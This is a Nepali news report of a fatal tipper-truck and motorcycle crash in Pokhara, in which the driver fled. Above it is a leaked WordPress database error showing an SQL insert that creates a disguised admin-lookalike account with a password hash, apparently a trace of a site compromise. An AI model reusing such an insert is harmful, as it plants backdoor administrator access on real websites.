WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKv3ZeVJfqTBRArExdGIZNtvANcIFa/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 22:31:57', '', 'admlnlx', 'admlnlx')
पोखरा, मंसिर १९–
पृथ्वी राजमार्ग अन्तर्गत पोखराको पृथ्वीचोकस्थित चाइना पुलमा आज बिहान टिपरले मोटरसाइकललाई ठक्कर दिँदा मोटरसाइकल चालकको मृत्यु भएको छ ।
ग १ ख४३५० नं को टिपरले ग २ प १०६६ नं को मोटरसाइकललाई पछाडिबाट ठक्कर दिँदा पोखरा– १८ खाल्टे मसिनाका १९ वर्षीय असिम गुरुङ सख्त घाइते भई तत्काल उपचारार्थ गण्डकी मेडिकल कलेजमा लगिएकामा उपचार गर्दागर्दै मृत्यु भएको वडा प्रहरी कार्यालय बैदामले जनाएको छ ।
टिपर चालक फरार रहेको र प्रहरीले निजको खोजी गरिरहेको बताइएको छ । गुरुङको शव परीक्षणका लागि पश्चिमाञ्चल क्षेत्रीय अस्पतालमा राखिएको छ ।